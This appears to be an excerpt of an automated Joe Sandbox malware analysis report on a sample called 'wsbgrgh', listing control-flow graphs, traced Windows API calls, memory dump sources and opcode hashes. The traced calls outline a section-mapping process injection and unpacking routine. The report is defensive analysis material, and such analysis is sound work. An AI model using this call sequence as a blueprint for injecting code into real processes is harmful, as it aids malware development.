                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Section$View$Create$DuplicateObject
                                      • String ID:
                                      • API String ID: 1546783058-0
                                      • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                      • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                      • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                      • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 291 401549-40156e call 401193 295 401570 291->295 296 401573-401578 291->296 295->296 298 401898-4018a0 296->298 299 40157e-40158f 296->299 298->296 304 4018a5-4018b7 298->304 302 401595-4015be 299->302 303 401896 299->303 302->303 313 4015c4-4015db NtDuplicateObject 302->313 303->304 310 4018c5 304->310 311 4018bc-4018e3 call 401193 304->311 310->311 313->303 315 4015e1-401605 NtCreateSection 313->315 317 401661-401687 NtCreateSection 315->317 318 401607-401628 NtMapViewOfSection 315->318 317->303 319 40168d-401691 317->319 318->317 321 40162a-401646 NtMapViewOfSection 318->321 319->303 322 401697-4016b8 NtMapViewOfSection 319->322 321->317 324 401648-40165e 321->324 322->303 325 4016be-4016da NtMapViewOfSection 322->325 324->317 325->303 328 4016e0 call 4016e5 325->328
                                      APIs
                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Section$View$Create$DuplicateObject
                                      • String ID:
                                      • API String ID: 1546783058-0
                                      • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                      • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                      • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                      • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 330 401557 331 40155b-40156e call 401193 330->331 332 40154f-401554 330->332 335 401570 331->335 336 401573-401578 331->336 332->331 335->336 338 401898-4018a0 336->338 339 40157e-40158f 336->339 338->336 344 4018a5-4018b7 338->344 342 401595-4015be 339->342 343 401896 339->343 342->343 353 4015c4-4015db NtDuplicateObject 342->353 343->344 350 4018c5 344->350 351 4018bc-4018e3 call 401193 344->351 350->351 353->343 355 4015e1-401605 NtCreateSection 353->355 357 401661-401687 NtCreateSection 355->357 358 401607-401628 NtMapViewOfSection 355->358 357->343 359 40168d-401691 357->359 358->357 361 40162a-401646 NtMapViewOfSection 358->361 359->343 362 401697-4016b8 NtMapViewOfSection 359->362 361->357 364 401648-40165e 361->364 362->343 365 4016be-4016da NtMapViewOfSection 362->365 364->357 365->343 368 4016e0 call 4016e5 365->368
                                      APIs
                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Section$View$Create$DuplicateObject
                                      • String ID:
                                      • API String ID: 1546783058-0
                                      • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                      • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                      • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                      • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 371 402f97-402fbb 372 402fc1-402fd9 371->372 373 4030ee-4030f3 371->373 372->373 374 402fdf-402ff0 372->374 375 402ff2-402ffb 374->375 376 403000-40300e 375->376 376->376 377 403010-403017 376->377 378 403039-403040 377->378 379 403019-403038 377->379 380 403062-403065 378->380 381 403042-403061 378->381 379->378 382 403067-40306a 380->382 383 40306e 380->383 381->380 382->383 384 40306c 382->384 383->375 385 403070-403075 383->385 384->385 385->373 386 403077-40307a 385->386 386->373 387 40307c-4030eb RtlCreateUserThread NtTerminateProcess 386->387 387->373
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: CreateProcessTerminateThreadUser
                                      • String ID:
                                      • API String ID: 1921587553-0
                                      • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                      • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                      • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                      • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 68 2de003c-2de0047 69 2de004c-2de0263 call 2de0a3f call 2de0e0f call 2de0d90 VirtualAlloc 68->69 70 2de0049 68->70 85 2de028b-2de0292 69->85 86 2de0265-2de0289 call 2de0a69 69->86 70->69 88 2de02a1-2de02b0 85->88 90 2de02ce-2de03c2 VirtualProtect call 2de0cce call 2de0ce7 86->90 88->90 91 2de02b2-2de02cc 88->91 97 2de03d1-2de03e0 90->97 91->88 98 2de0439-2de04b8 VirtualFree 97->98 99 2de03e2-2de0437 call 2de0ce7 97->99 101 2de04be-2de04cd 98->101 102 2de05f4-2de05fe 98->102 99->97 104 2de04d3-2de04dd 101->104 105 2de077f-2de0789 102->105 106 2de0604-2de060d 102->106 104->102 108 2de04e3-2de0505 104->108 109 2de078b-2de07a3 105->109 110 2de07a6-2de07b0 105->110 106->105 111 2de0613-2de0637 106->111 119 2de0517-2de0520 108->119 120 2de0507-2de0515 108->120 109->110 112 2de086e-2de08be LoadLibraryA 110->112 113 2de07b6-2de07cb 110->113 114 2de063e-2de0648 111->114 118 2de08c7-2de08f9 112->118 116 2de07d2-2de07d5 113->116 114->105 117 2de064e-2de065a 114->117 121 2de07d7-2de07e0 116->121 122 2de0824-2de0833 116->122 117->105 123 2de0660-2de066a 117->123 124 2de08fb-2de0901 118->124 125 2de0902-2de091d 118->125 126 2de0526-2de0547 119->126 120->126 127 2de07e4-2de0822 121->127 128 2de07e2 121->128 130 2de0839-2de083c 122->130 129 2de067a-2de0689 123->129 124->125 134 2de054d-2de0550 126->134 127->116 128->122 131 2de068f-2de06b2 129->131 132 2de0750-2de077a 129->132 130->112 133 2de083e-2de0847 130->133 135 2de06ef-2de06fc 131->135 136 2de06b4-2de06ed 131->136 132->114 137 2de084b-2de086c 133->137 138 2de0849 133->138 140 2de0556-2de056b 134->140 141 2de05e0-2de05ef 134->141 142 2de06fe-2de0748 135->142 143 2de074b 135->143 136->135 137->130 138->112 144 2de056f-2de057a 140->144 145 2de056d 140->145 141->104 142->143 143->129 146 2de057c-2de0599 144->146 147 2de059b-2de05bb 144->147 145->141 152 2de05bd-2de05db 146->152 147->152 152->134
                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02DE024D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2069915449.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_2de0000_wsbgrgh.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: cess$kernel32.dll
                                      • API String ID: 4275171209-1230238691
                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction ID: 18aa183273b5f6f9607d16aaeab441365940d8a99b46a2781a1a081a15357831
                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction Fuzzy Hash: D0526874A002299FDB64DF58C984BACBBB1BF09305F1480D9E94EAB351DB70AE85CF14

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 370 415bd0-415d10 GetModuleHandleW GetProcAddress VirtualProtect
                                      APIs
                                      • GetModuleHandleW.KERNEL32(02B19CE8), ref: 00415CAF
                                      • GetProcAddress.KERNEL32(00000000,0041BCD0), ref: 00415CEC
                                      • VirtualProtect.KERNELBASE(02B19B2C,02B19CE4,00000040,?), ref: 00415D0B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068533700.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_40b000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProtectVirtual
                                      • String ID:
                                      • API String ID: 2099061454-3916222277
                                      • Opcode ID: fce140ef23c65c88e38e2773b9808fd7a4a7f181c7d9ac89fa5d9b1ed533d8e0
                                      • Instruction ID: bc4e3c19969ebc9a4e99d85580481d2fdd23850efab95505bf2beb8bb76e5d7b
                                      • Opcode Fuzzy Hash: fce140ef23c65c88e38e2773b9808fd7a4a7f181c7d9ac89fa5d9b1ed533d8e0
                                      • Instruction Fuzzy Hash: DF3155149487C0CAE301CB78F8547823FA2EB25744F44847CD589873A5EFBA1524D7EE

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 388 2e4fb5a-2e4fb73 389 2e4fb75-2e4fb77 388->389 390 2e4fb7e-2e4fb8a CreateToolhelp32Snapshot 389->390 391 2e4fb79 389->391 392 2e4fb8c-2e4fb92 390->392 393 2e4fb9a-2e4fba7 Module32First 390->393 391->390 392->393 399 2e4fb94-2e4fb98 392->399 394 2e4fbb0-2e4fbb8 393->394 395 2e4fba9-2e4fbaa call 2e4f819 393->395 400 2e4fbaf 395->400 399->389 399->393 400->394
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E4FB82
                                      • Module32First.KERNEL32(00000000,00000224), ref: 02E4FBA2
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2070115442.0000000002E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4C000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_2e4c000_wsbgrgh.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3833638111-0
                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction ID: f816d9af40980749b5b9f2afb984de8aa61e2f1250a07f3400d999461a6ef8f1
                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction Fuzzy Hash: 53F0F6325407146FD7203BF4BCACF6E72ECAF4AA28F105168E643918C0CF70E8054A61

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 401 2de0e0f-2de0e24 SetErrorMode * 2 402 2de0e2b-2de0e2c 401->402 403 2de0e26 401->403 403->402
                                      APIs
                                      • SetErrorMode.KERNELBASE(00000400,?,?,02DE0223,?,?), ref: 02DE0E19
                                      • SetErrorMode.KERNELBASE(00000000,?,?,02DE0223,?,?), ref: 02DE0E1E
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2069915449.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_2de0000_wsbgrgh.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction ID: 4750618981923a01f89273afc3a4e037d58370ce1d0f83cbcc8ad4e0bd2a7547
                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction Fuzzy Hash: AFD0123114512877DB003A94DC09BCD7B1CDF05B67F008021FB0DE9180C7B0994086E5

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 404 4018e6-40194b call 401193 Sleep call 40141f 418 40195a-4019a5 call 401193 404->418 419 40194d-401955 call 401514 404->419 419->418
                                      APIs
                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectSleepView
                                      • String ID:
                                      • API String ID: 1885482327-0
                                      • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                      • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                      • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                      • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 433 401915-401918 434 4018c6-4018c7 433->434 435 40191a-40194b call 401193 Sleep call 40141f 433->435 436 4018d7 434->436 437 4018ce-4018e3 call 401193 434->437 447 40195a-4019a5 call 401193 435->447 448 40194d-401955 call 401514 435->448 436->437 448->447
                                      APIs
                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectSleepView
                                      • String ID:
                                      • API String ID: 1885482327-0
                                      • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                      • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                      • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                      • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 462 4018f1-40194b call 401193 Sleep call 40141f 472 40195a-4019a5 call 401193 462->472 473 40194d-401955 call 401514 462->473 473->472
                                      APIs
                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectSleepView
                                      • String ID:
                                      • API String ID: 1885482327-0
                                      • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                      • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                      • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                      • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 487 401912-40194b call 401193 Sleep call 40141f 498 40195a-4019a5 call 401193 487->498 499 40194d-401955 call 401514 487->499 499->498
                                      APIs
                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectSleepView
                                      • String ID:
                                      • API String ID: 1885482327-0
                                      • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                      • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                      • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                      • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02E4F86A
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2070115442.0000000002E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4C000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_2e4c000_wsbgrgh.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction ID: d0017b937d08ab791c00d636ac3392bd75ec71a8a7316360447011fb0bd3eb2f
                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction Fuzzy Hash: 51112879A40208EFDB01DF98C985E98BBF5EF08751F1580A4FA489B361D771EA90DF80
                                      APIs
                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectSleepView
                                      • String ID:
                                      • API String ID: 1885482327-0
                                      • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                      • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                      • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                      • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                      APIs
                                      • LocalAlloc.KERNELBASE(00000000,02B19CE4,0041624B), ref: 00415BA8
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068533700.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_40b000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: AllocLocal
                                      • String ID:
                                      • API String ID: 3494564517-0
                                      • Opcode ID: bc268097d7bb7fb4f78415c0ee36feb01ff13b3e1ebb730f1ec7cab6ec31a301
                                      • Instruction ID: fe12b94824aaeca9f7b044923cb86b1d99ba87f8ef2d7c3be42197bf5250df23
                                      • Opcode Fuzzy Hash: bc268097d7bb7fb4f78415c0ee36feb01ff13b3e1ebb730f1ec7cab6ec31a301
                                      • Instruction Fuzzy Hash: D5B092B09846409BD7008BB0A814B513AA4F308742F404461F60982180CA2014208F14
                                      APIs
                                      • BuildCommDCBA.KERNEL32(00000000,?), ref: 00415DD1
                                      • WritePrivateProfileStringA.KERNEL32(00418370,0041834C,00418324,00418314), ref: 00415DF5
                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415DFD
                                      • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415E3D
                                      • GetComputerNameW.KERNEL32(?,?), ref: 00415E51
                                      • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415E5F
                                      • OpenJobObjectA.KERNEL32(00000000,00000000,00418398), ref: 00415E6E
                                      • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415E7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068533700.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_40b000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                      • String ID: -
                                      • API String ID: 113859268-2547889144
                                      • Opcode ID: 53c3cc1668bbfc59426ceed2c59907604522a8f50e66552bdf02a6620a93bac6
                                      • Instruction ID: abc8187be86aaec5557a924f26b2f4a332d91e2d9627e3e72ea80ce62a19c939
                                      • Opcode Fuzzy Hash: 53c3cc1668bbfc59426ceed2c59907604522a8f50e66552bdf02a6620a93bac6
                                      • Instruction Fuzzy Hash: D721FD31E84344EBD7209FA4DC85BDA7B74EB4CB11F1080AAF64DAA1C0CAB416C48B59
                                      APIs
                                      • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00415EF4
                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415F0F
                                      • HeapDestroy.KERNEL32(00000000), ref: 00415F2E
                                      • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415F36
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068533700.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_40b000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                      • String ID:
                                      • API String ID: 367530164-0
                                      • Opcode ID: 1631845fca2a3b933b01173c481672e708b800b3662ef8171a9e2b6aaa0f14d0
                                      • Instruction ID: c20d9250ee03896141b2a136b5260c7d7263afdf9e87988df33f4b26659f440c
                                      • Opcode Fuzzy Hash: 1631845fca2a3b933b01173c481672e708b800b3662ef8171a9e2b6aaa0f14d0
                                      • Instruction Fuzzy Hash: 7D01F270A84604DBD710EBA4ED49BDA7BB8EB0C706F804077F60A97281DA3419948B5A